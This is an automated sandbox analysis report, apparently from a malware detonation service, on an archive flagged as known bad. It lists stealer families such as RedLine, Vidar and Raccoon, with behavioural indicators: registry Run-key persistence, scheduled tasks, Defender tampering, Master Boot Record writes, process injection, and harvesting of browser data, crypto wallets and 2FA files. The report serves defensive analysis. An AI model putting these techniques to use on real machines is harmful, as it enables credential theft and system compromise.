Analysis Overview
SHA256
4c7081148a218b609dca62b2ce1106e4a2e075671b0fb64352056cd6e58e7873
Threat Level: Known bad
The file infected.zip was found to be: Known bad.
Malicious Activity Summary
RedLine payload
Modifies Windows Defender Real-time Protection settings
Vidar
Rhadamanthys
Raccoon
Windows security bypass
GCleaner
RedLine
PureCrypter
Detect rhadamanthys stealer shellcode
Suspicious use of NtCreateUserProcessOtherParentProcess
ACProtect 1.3x - 1.4x DLL software
Executes dropped EXE
Blocklisted process makes network request
Downloads MZ/PE file
UPX packed file
Uses the VBS compiler for execution
Reads user/profile data of web browsers
Checks BIOS information in registry
Loads dropped DLL
Checks computer location settings
Writes to the Master Boot Record (MBR)
Drops desktop.ini file(s)
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Adds Run key to start application
Drops Chrome extension
Accesses 2FA software files, possible credential harvesting
Looks up external IP address via web service
Checks for any installed AV software in registry
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Program crash
Enumerates physical storage devices
Modifies registry class
Modifies data under HKEY_USERS
Checks processor information in registry
Delays execution with timeout.exe
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Runs ping.exe
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Kills process with taskkill
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-01-15 17:12
Signatures
Analysis: behavioral10
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:17
Platform
win10v2004-20220812-en
Max time kernel
212s
Max time network
225s
Command Line
Signatures
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
GCleaner
Raccoon
RedLine
RedLine payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3996 created 2468 | N/A | C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe | C:\Windows\system32\taskhostw.exe |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\ScanRename\ScanRename.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\InfoInstall = "C:\\Users\\Admin\\AppData\\Roaming\\InfoInstall\\InfoInstall.exe" | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | ip-api.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Documents\best_hack.zip_id23904541.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A53B1AB43B3D351517A14F4A651C94F1 | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5FEB33CBE0463E334B23E93A48C2DB5C | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5FEB33CBE0463E334B23E93A48C2DB5C | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Windows\SysWOW64\is-752BJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A53B1AB43B3D351517A14F4A651C94F1 | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\fontview.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\fontview.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\fontview.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3996 set thread context of 1952 | N/A | C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Program Files (x86)\Any Drive Formatter\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\OdCkbftzuRPDCLooswR\xprHIYg.dll | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-DL9FL.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-SM4I8.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-N3B0G.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\Documentation\Russian\is-U0NO9.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\Languages\is-TJ8E5.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-3LBDQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-HVIUU.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-EP9NM.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-JJNEH.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-B9TM5.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\unWhUoTpcLxwC\CqRtzkA.xml | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-3UEPQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| File created | C:\Program Files (x86)\OdCkbftzuRPDCLooswR\dsKYSUK.xml | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-23HT1.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-2L7CS.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-4O43K.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\Documentation\English\is-NUOFE.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-0OITV.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-06SNK.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-QQUHA.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\unWhUoTpcLxwC\BoOieqA.dll | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\NxGlAgQUfzUn\PlxUODa.dll | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-B4BFK.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-6KBKJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-4QSVS.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\cjNumber | C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-F7CVS.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\WyuevociGfNU2\AzXfaRieDbpAf.dll | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-109K0.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\WyuevociGfNU2\LzOYMrW.xml | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-TFLMS.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-CQUMN.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-17VQJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Reg Organizer\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-QVMD2.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-44H7C.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-JV0OQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-TNG86.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\ScanRename\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\ScanRename\ScanRename.exe | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| File created | C:\Program Files (x86)\XxxUzwYQU\zfRebA.dll | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\XxxUzwYQU\GnbMyEB.xml | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-7OO28.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-HTHBB.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-M0UH9.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-67BUK.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-GORKS.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-LN7NC.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-NHVQB.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-R7RB9.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\Tasks\YQwpFizkoQMsJvRhq.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\bGAvhKhnIPTNQeobsw.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\YESfVrKgbFKcjSeIN.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\iwOiVBtjWoVYUMW.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\SysWOW64\fontview.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\SysWOW64\fontview.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\SysWOW64\fontview.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\SysWOW64\fontview.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\SysWOW64\fontview.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
